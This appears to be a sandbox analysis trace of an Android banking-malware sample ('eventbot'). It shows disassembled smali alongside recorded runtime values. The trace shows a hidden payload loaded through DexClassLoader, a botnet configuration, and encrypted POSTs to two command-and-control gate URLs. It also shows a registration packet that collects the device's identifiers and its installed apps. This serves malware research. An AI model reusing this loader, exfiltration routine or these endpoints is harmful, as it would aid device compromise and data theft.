                        94invoke-virtual {v9}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
                        95move-result-object v9
                        97invoke-virtual/range {p1 .. p1}, Landroid/content/Context;->getClassLoader()Ljava/lang/ClassLoader;
                        98move-result-object v10
                        100invoke-direct {v8, v4, v9, v3, v10}, Ldalvik/system/DexClassLoader;-><init>(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/ClassLoader;)V
                        • Time: 149586
                          • This:
                            • dalvik.system.DexClassLoader[DexPathList[[zip file "/data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar"],nativeLibraryDirectories=[/system/lib, /vendor/lib]]]
                          • p0: /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                          • p1: /data/user/0/com.example.eventbot/app_outdex
                          • p2: null
                          • p3: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.example.eventbot-1/base.apk"],nativeLibraryDirectories=[/data/app/com.example.eventbot-1/lib/x86, /system/lib, /vendor/lib]]]
                          • Return:
                            • dalvik.system.DexClassLoader[DexPathList[[zip file "/data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar"],nativeLibraryDirectories=[/system/lib, /vendor/lib]]]
                        101try_start_87:
                        102const-string v4, "com.lib"
                        104invoke-virtual {v8, v4}, Ldalvik/system/DexClassLoader;->loadClass(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 149616
                          • This:
                            • dalvik.system.DexClassLoader[DexPathList[[zip file "/data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar"],nativeLibraryDirectories=[/system/lib, /vendor/lib]]]
                          • p0: com.lib
                          • Return:
                            • class com.lib
                            • getName: com.lib
                        105move-result-object v4
                        106const/4 v8, 0x2
                        107if-eq v0, v7, :cond_a5
                        108if-eq v0, v8, :cond_95
                        109move-object v0, v3
                        110goto/16 :goto_168
                        111cond_95: new-array v0, v5, [Ljava/lang/Class;
                        113invoke-virtual {v4, v0}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
                        114move-result-object v0
                        115new-array v4, v5, [Ljava/lang/Object;
                        117invoke-virtual {v0, v4}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
                        118move-result-object v0
                        119check-cast v0, Lcom/libInterface;
                        120goto/16 :goto_168
                        121cond_a5: const/16 v0, 0x10
                        122new-array v9, v0, [Ljava/lang/Class;
                        123const-class v10, Landroid/content/Context;
                        124aput-object v10, v9, v5
                        125const-class v10, Landroid/content/Context;
                        126aput-object v10, v9, v7
                        127const-class v10, Ljava/lang/String;
                        128aput-object v10, v9, v8
                        129const-class v10, Ljava/lang/String;
                        130const/4 v11, 0x3
                        131aput-object v10, v9, v11
                        132const-class v10, Ljava/lang/String;
                        133const/4 v12, 0x4
                        134aput-object v10, v9, v12
                        135const-class v10, Ljava/lang/Long;
                        136const/4 v13, 0x5
                        137aput-object v10, v9, v13
                        138const-class v10, Ljava/lang/Integer;
                        139const/4 v14, 0x6
                        140aput-object v10, v9, v14
                        141const-class v10, Ljava/lang/Long;
                        142const/4 v15, 0x7
                        143aput-object v10, v9, v15
                        144const-class v10, Ljava/lang/String;
                        145const/16 v16, 0x8
                        146aput-object v10, v9, v16
                        147const-class v10, Ljava/lang/String;
                        148const/16 v17, 0x9
                        149aput-object v10, v9, v17
                        150const-class v10, Ljava/lang/String;
                        151const/16 v18, 0xa
                        152aput-object v10, v9, v18
                        153const-class v10, Ljava/lang/Class;
                        154const/16 v19, 0xb
                        155aput-object v10, v9, v19
                        156const/16 v10, 0xc
                        157const-class v20, Ljava/lang/Integer;
                        158aput-object v20, v9, v10
                        159const/16 v10, 0xd
                        160const-class v20, Ljava/lang/Integer;
                        161aput-object v20, v9, v10
                        162const/16 v10, 0xe
                        163const-class v20, Ljava/lang/Integer;
                        164aput-object v20, v9, v10
                        165const/16 v10, 0xf
                        166const-class v20, Ljava/lang/String;
                        167aput-object v20, v9, v10
                        169invoke-virtual {v4, v9}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
                        170move-result-object v4
                        171new-array v0, v0, [Ljava/lang/Object;
                        172aput-object v1, v0, v5
                        174sget-object v9, Lcom/example/eventbot/events;->context:Landroid/content/Context;
                        175aput-object v9, v0, v7
                        177sget-object v7, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        178aput-object v7, v0, v8
                        180sget-object v7, Lcom/example/eventbot/cfg;->botVersion:Ljava/lang/String;
                        181aput-object v7, v0, v11
                        183sget-object v7, Lcom/example/eventbot/cfg;->gatePublicKey:Ljava/lang/String;
                        184aput-object v7, v0, v12
                        186sget-object v7, Lcom/example/eventbot/cfg;->knockDelay:Ljava/lang/Long;
                        187aput-object v7, v0, v13
                        189sget-object v7, Lcom/example/eventbot/cfg;->webRetries:Ljava/lang/Integer;
                        190aput-object v7, v0, v14
                        192sget-object v7, Lcom/example/eventbot/cfg;->permissionsDelay:Ljava/lang/Long;
                        193aput-object v7, v0, v15
                        195sget-object v7, Lcom/example/eventbot/cfg;->urls:Ljava/lang/String;
                        196aput-object v7, v0, v16
                        198const-string v7, "events"
                        199aput-object v7, v0, v17
                        201invoke-virtual/range {p0 .. p0}, Lcom/example/eventbot/service;->getResources()Landroid/content/res/Resources;
                        202move-result-object v7
                        203const v8, 0x7f0b0028
                        205invoke-virtual {v7, v8}, Landroid/content/res/Resources;->getString(I)Ljava/lang/String;
                        • Time: 149624
                          • This:
                            • android.content.res.Resources@48035cb
                          • id: 2131427368
                          • Return:
                            • Flash Update
                        206move-result-object v7
                        207aput-object v7, v0, v18
                        208const-class v7, Lcom/example/eventbot/activity;
                        209aput-object v7, v0, v19
                        210const/16 v7, 0xc
                        211const v8, 0x7f0b003d
                        213invoke-static {v8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        214move-result-object v8
                        215aput-object v8, v0, v7
                        216const/16 v7, 0xd
                        217const v8, 0x7f0b003c
                        219invoke-static {v8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        220move-result-object v8
                        221aput-object v8, v0, v7
                        222const/16 v7, 0xe
                        223const v8, 0x7f0b0029
                        225invoke-static {v8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        226move-result-object v8
                        227aput-object v8, v0, v7
                        228const/16 v7, 0xf
                        230sget-object v8, Lcom/example/eventbot/cfg;->botnetID:Ljava/lang/String;
                        231aput-object v8, v0, v7
                        233invoke-virtual {v4, v0}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 149681
                          • This:
                            • public com.lib(android.content.Context,android.content.Context,java.lang.String,java.lang.String,java.lang.String,java.lang.Long,java.lang.Integer,java.lang.Long,java.lang.String,java.lang.String,java.lang.String,java.lang.Class,java.lang.Integer,java.lang.Integer,java.lang.Integer,java.lang.String)
                          • p0: com.example.eventbot.service@5c14a30
                          • p1: null
                          • p2: eventBot
                          • p3: 0.0.0.2
                          • p4: 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • p5: 15
                          • p6: 3
                          • p7: 15
                          • p8: http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c;http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                          • p9: events
                          • p10: Flash Update
                          • p11: class com.example.eventbot.activity
                          • p11.getName: com.example.eventbot.activity
                          • p12: 2131427389
                          • p13: 2131427388
                          • p14: 2131427369
                          • p15: test2005
                          • Return:
                            • com.lib@c31a684
                        234move-result-object v0
                        235check-cast v0, Lcom/libInterface;
                        236try_end_168: move-object v3, v0
                        237goto/16 :goto_17e
                        238catch_16a: nop
                        239if-eqz v6, :cond_17e
                        240try_start_16d: new-instance v0, Ljava/io/File;
                        242invoke-virtual {v1, v2, v5}, Lcom/example/eventbot/service;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        243move-result-object v4
                        245invoke-virtual/range {p0 .. p0}, Lcom/example/eventbot/service;->genLibUpdateName()Ljava/lang/String;
                        246move-result-object v6
                        248invoke-direct {v0, v4, v6}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
                        250invoke-virtual {v0}, Ljava/io/File;->delete()Z
                        251try_end_17d: const/4 v6, 0x0
                        252cond_17e: if-eqz v6, :cond_1c6
                        253if-eqz v3, :cond_1c6
                        254try_start_182: new-instance v0, Ljava/io/File;
                        256invoke-virtual {v1, v2, v5}, Lcom/example/eventbot/service;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        257move-result-object v4
                        259invoke-virtual/range {p0 .. p0}, Lcom/example/eventbot/service;->genLibName()Ljava/lang/String;
                        260move-result-object v6
                        262invoke-direct {v0, v4, v6}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
                        264invoke-virtual {v0}, Ljava/io/File;->exists()Z
                        265move-result v4
                        266if-eqz v4, :cond_198
                        268invoke-virtual {v0}, Ljava/io/File;->delete()Z
                        269cond_198: new-instance v4, Ljava/io/File;
                        271invoke-virtual {v1, v2, v5}, Lcom/example/eventbot/service;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        272move-result-object v2
                        274invoke-virtual/range {p0 .. p0}, Lcom/example/eventbot/service;->genLibUpdateName()Ljava/lang/String;
                        275move-result-object v5
                        277invoke-direct {v4, v2, v5}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
                        279invoke-virtual {v4}, Ljava/io/File;->exists()Z
                        280move-result v2
                        281if-eqz v2, :cond_1c6
                        283invoke-virtual {v4, v0}, Ljava/io/File;->renameTo(Ljava/io/File;)Z
                        284try_end_1ae: goto/16 :goto_1c6
                        285catch_1af: move-exception v0
                        286try_start_1b0:
                        287sget-object v2, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        288new-instance v4, Ljava/lang/StringBuilder;
                        290invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        292const-string v5, "[func] [service] [loadLib] [fallback] exception: "
                        294invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        296invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        298invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        299move-result-object v0
                        301invoke-static {v2, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        302goto_1c6: if-eqz p3, :cond_1d7
                        303try_start_1c8:
                        304sget-object v0, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        306invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        307goto/16 :goto_1d7
                        308catchall_1ce: move-exception v0
                        309if-eqz p3, :cond_1d6
                        311sget-object v2, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        313invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        314cond_1d6: throw v0
                        315catch_1d7: return-object v3
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.URL.<init>
                        • java.net.URL.openConnection
                        • java.lang.Integer.intValue
                        • java.net.HttpURLConnection.setReadTimeout
                        • java.lang.Integer.intValue
                        • java.net.HttpURLConnection.setConnectTimeout
                        • java.net.HttpURLConnection.setRequestMethod
                        • java.net.HttpURLConnection.setDoInput
                        • java.net.HttpURLConnection.setDoOutput
                        • java.util.List.get
                        • java.lang.String.getBytes
                        • java.lang.StringBuilder.<init>
                        • java.util.List.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Base64.encodeToString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.util.List.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.util.List.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.HttpURLConnection.getOutputStream
                        • java.io.OutputStreamWriter.<init>
                        • java.io.BufferedWriter.<init>
                        • java.io.BufferedWriter.write
                        • java.io.BufferedWriter.flush
                        • java.io.BufferedWriter.close
                        • java.io.OutputStream.close
                        • java.net.HttpURLConnection.getResponseCode
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.HttpURLConnection.getInputStream
                        • java.io.InputStreamReader.<init>
                        • java.io.BufferedReader.<init>
                        • java.lang.StringBuffer.<init>
                        • java.io.BufferedReader.readLine
                        • java.lang.StringBuffer.append
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.BufferedReader.close
                        • java.util.List.get
                        • java.lang.StringBuffer.toString
                        • java.lang.String.getBytes
                        • android.util.Base64.decode
                        • java.lang.String.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] sendPost request:
                        • http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                        • http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                        • POST
                        • [func] sendPost curveShared:
                        • [func] sendPost curvePublic:
                        • UTF-8
                        • [func] sendPost resp code:
                        • [func] sendPost failed:
                        • [func] sendPost decoded responce:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x0
                        2new-instance v0, Ljava/lang/StringBuilder;
                        4invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        6const-string v1, "[func] sendPost request: "
                        8invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        9move-result-object v0
                        11invoke-virtual {v0, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        12move-result-object v0
                        14invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        15move-result-object v0
                        17invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        18try_start_17: new-instance v0, Ljava/net/URL;
                        20invoke-direct {v0, p1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
                        • Time: 151018
                          • This:
                            • http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                          • p0: http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                          • Return:
                            • http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                        • Time: 163937
                          • This:
                            • http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                          • p0: http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                          • Return:
                            • http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                        22invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
                        • Time: 151027
                          • This:
                            • http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                          • Return:
                            • com.android.okhttp.internal.huc.HttpURLConnectionImpl:http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                        • Time: 163941
                          • This:
                            • http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                          • Return:
                            • com.android.okhttp.internal.huc.HttpURLConnectionImpl:http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                        23move-result-object v0
                        24check-cast v0, Ljava/net/HttpURLConnection;
                        26invoke-virtual {p3}, Ljava/lang/Integer;->intValue()I
                        27move-result v1
                        28mul-int/lit16 v1, v1, 0x3e8
                        30invoke-virtual {v0, v1}, Ljava/net/HttpURLConnection;->setReadTimeout(I)V
                        32invoke-virtual {p3}, Ljava/lang/Integer;->intValue()I
                        33move-result v1
                        34mul-int/lit16 v1, v1, 0x3e8
                        36invoke-virtual {v0, v1}, Ljava/net/HttpURLConnection;->setConnectTimeout(I)V
                        38const-string v1, "POST"
                        40invoke-virtual {v0, v1}, Ljava/net/HttpURLConnection;->setRequestMethod(Ljava/lang/String;)V
                        41const/4 v1, 0x1
                        43invoke-virtual {v0, v1}, Ljava/net/HttpURLConnection;->setDoInput(Z)V
                        44const/4 v1, 0x1
                        46invoke-virtual {v0, v1}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V
                        48iget-object v1, p0, Lcom/lib;->gateKey:Ljava/lang/String;
                        50invoke-virtual {p0, v1}, Lcom/lib;->curve25519GetShared(Ljava/lang/String;)Ljava/util/List;
                        51move-result-object v3
                        52const/4 v1, 0x0
                        54invoke-interface {v3, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        55move-result-object v1
                        56check-cast v1, [B
                        58invoke-virtual {p0, v1}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        59move-result-object v1
                        61invoke-virtual {p2}, Ljava/lang/String;->getBytes()[B
                        62move-result-object v4
                        64invoke-virtual {p0, v1, v4}, Lcom/lib;->rc4(Ljava/lang/String;[B)[B
                        65move-result-object v1
                        67invoke-virtual {p0, v1}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        68move-result-object v4
                        69new-instance v5, Ljava/lang/StringBuilder;
                        71invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        72const/4 v1, 0x1
                        74invoke-interface {v3, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        75move-result-object v1
                        76check-cast v1, [B
                        78invoke-virtual {p0, v1}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        79move-result-object v1
                        81invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        82move-result-object v1
                        84invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        85move-result-object v1
                        87invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        88move-result-object v1
                        90invoke-virtual {p0, v1}, Lcom/lib;->hexStringToByteArray(Ljava/lang/String;)[B
                        91move-result-object v1
                        92const/4 v4, 0x0
                        94invoke-static {v1, v4}, Landroid/util/Base64;->encodeToString([BI)Ljava/lang/String;
                        95move-result-object v4
                        96new-instance v1, Ljava/lang/StringBuilder;
                        98invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        100const-string v5, "[func] sendPost curveShared: "
                        102invoke-virtual {v1, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        103move-result-object v5
                        104const/4 v1, 0x0
                        106invoke-interface {v3, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        107move-result-object v1
                        108check-cast v1, [B
                        110invoke-virtual {p0, v1}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        111move-result-object v1
                        113invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        114move-result-object v1
                        116invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        117move-result-object v1
                        119invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        120new-instance v1, Ljava/lang/StringBuilder;
                        122invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        124const-string v5, "[func] sendPost curvePublic: "
                        126invoke-virtual {v1, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        127move-result-object v5
                        128const/4 v1, 0x1
                        130invoke-interface {v3, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        131move-result-object v1
                        132check-cast v1, [B
                        134invoke-virtual {p0, v1}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        135move-result-object v1
                        137invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        138move-result-object v1
                        140invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        141move-result-object v1
                        143invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        145invoke-virtual {v0}, Ljava/net/HttpURLConnection;->getOutputStream()Ljava/io/OutputStream;
                        146move-result-object v1
                        147new-instance v5, Ljava/io/BufferedWriter;
                        148new-instance v6, Ljava/io/OutputStreamWriter;
                        150const-string v7, "UTF-8"
                        152invoke-direct {v6, v1, v7}, Ljava/io/OutputStreamWriter;-><init>(Ljava/io/OutputStream;Ljava/lang/String;)V
                        154invoke-direct {v5, v6}, Ljava/io/BufferedWriter;-><init>(Ljava/io/Writer;)V
                        156invoke-virtual {v5, v4}, Ljava/io/BufferedWriter;->write(Ljava/lang/String;)V
                        158invoke-virtual {v5}, Ljava/io/BufferedWriter;->flush()V
                        160invoke-virtual {v5}, Ljava/io/BufferedWriter;->close()V
                        162invoke-virtual {v1}, Ljava/io/OutputStream;->close()V
                        164invoke-virtual {v0}, Ljava/net/HttpURLConnection;->getResponseCode()I
                        165move-result v1
                        166new-instance v4, Ljava/lang/StringBuilder;
                        168invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        170const-string v5, "[func] sendPost resp code: "
                        172invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        173move-result-object v4
                        175invoke-virtual {v4, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        176move-result-object v4
                        178invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        179move-result-object v4
                        181invoke-virtual {p0, v4}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        182const/16 v4, 0xc8
                        183if-ne v1, v4, :cond_175
                        184new-instance v1, Ljava/io/BufferedReader;
                        185new-instance v4, Ljava/io/InputStreamReader;
                        187invoke-virtual {v0}, Ljava/net/HttpURLConnection;->getInputStream()Ljava/io/InputStream;
                        188move-result-object v0
                        190invoke-direct {v4, v0}, Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream;)V
                        192invoke-direct {v1, v4}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
                        193new-instance v4, Ljava/lang/StringBuffer;
                        195const-string v0, ""
                        197invoke-direct {v4, v0}, Ljava/lang/StringBuffer;-><init>(Ljava/lang/String;)V
                        199const-string v0, ""
                        200goto_116:
                        201invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
                        202move-result-object v0
                        203if-eqz v0, :cond_139
                        205invoke-virtual {v4, v0}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
                        206try_end_11f: goto/16 :goto_116
                        207catch_120: move-exception v0
                        208new-instance v1, Ljava/lang/StringBuilder;
                        210invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        212const-string v3, "[func] sendPost failed: "
                        214invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        215move-result-object v1
                        217invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        218move-result-object v0
                        220invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        221move-result-object v0
                        223invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        224move-object v0, v2
                        225goto_138: return-object v0
                        226try_start_139:
                        227invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
                        228new-instance v1, Ljava/lang/String;
                        229const/4 v0, 0x0
                        231invoke-interface {v3, v0}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        232move-result-object v0
                        233check-cast v0, [B
                        235invoke-virtual {p0, v0}, Lcom/lib;->bytesToHex([B)Ljava/lang/String;
                        236move-result-object v0
                        238invoke-virtual {v4}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
                        239move-result-object v3
                        241invoke-virtual {v3}, Ljava/lang/String;->getBytes()[B
                        242move-result-object v3
                        243const/4 v4, 0x0
                        245invoke-static {v3, v4}, Landroid/util/Base64;->decode([BI)[B
                        246move-result-object v3
                        248invoke-virtual {p0, v0, v3}, Lcom/lib;->rc4(Ljava/lang/String;[B)[B
                        249move-result-object v0
                        251invoke-direct {v1, v0}, Ljava/lang/String;-><init>([B)V
                        252new-instance v0, Ljava/lang/StringBuilder;
                        254invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        256const-string v3, "[func] sendPost decoded responce: "
                        258invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        259move-result-object v0
                        261invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        262move-result-object v0
                        264invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        265move-result-object v0
                        267invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        268try_end_173: move-object v0, v1
                        269goto/16 :goto_138
                        270cond_175: move-object v0, v2
                        271goto/16 :goto_138
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • android.os.Build$VERSION.RELEASE:Ljava/lang/String
                        • org.json.JSONObject.put
                        • android.os.Build.MANUFACTURER:Ljava/lang/String
                        • org.json.JSONObject.put
                        • android.os.Build.MODEL:Ljava/lang/String
                        • org.json.JSONObject.put
                        • java.lang.Object.toString
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • android.content.Context.getContentResolver
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • UID
                        • OS
                        • 7.1.2
                        • MODEL
                        • samsung
                        • VENDOR
                        • Galaxy Nexus
                        • APPS
                        • GPstatus
                        • GPversion
                        • botnetID
                        • botVer
                        • libVer
                        • 0.0.0.1
                        • screenLockType
                        • reason
                        • reg
                        • data
                        • [func] [makeRegPacket] T:
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Lorg/json/JSONObject;
                        3invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        • Time: 149782
                          • Return:
                            • {}
                        4try_start_5: new-instance v1, Lorg/json/JSONObject;
                        6invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        • Time: 149787
                          • Return:
                            • {}
                        8const-string v2, "UID"
                        10invoke-virtual {p0, p1}, Lcom/lib;->getUID(Landroid/content/Context;)Ljava/lang/String;
                        11move-result-object v3
                        13invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        15const-string v2, "OS"
                        17sget-object v3, Landroid/os/Build$VERSION;->RELEASE:Ljava/lang/String;
                        • Time: 149815
                          • Return:
                            • 7.1.2
                        19invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        21const-string v2, "MODEL"
                        23sget-object v3, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
                        • Time: 149817
                          • Return:
                            • samsung
                        25invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        27const-string v2, "VENDOR"
                        29sget-object v3, Landroid/os/Build;->MODEL:Ljava/lang/String;
                        • Time: 149824
                          • Return:
                            • Galaxy Nexus
                        31invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        33const-string v2, "APPS"
                        35invoke-virtual {p0, p1}, Lcom/lib;->getAllApps(Landroid/content/Context;)Ljava/util/List;
                        36move-result-object v3
                        38invoke-virtual {v3}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        39move-result-object v3
                        41invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        43const-string v2, "GPstatus"
                        45invoke-virtual {p0, p1}, Lcom/lib;->getGpStatus(Landroid/content/Context;)Z
                        46move-result v3
                        48invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        50const-string v2, "GPversion"
                        52sget-object v3, Lcom/lib;->STRING_GP_APP:Ljava/lang/String;
                        54invoke-static {p1, v3}, Lcom/lib;->getAppVersion(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
                        55move-result-object v3
                        57invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        59const-string v2, "botnetID"
                        61iget-object v3, p0, Lcom/lib;->botnetID:Ljava/lang/String;
                        63invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
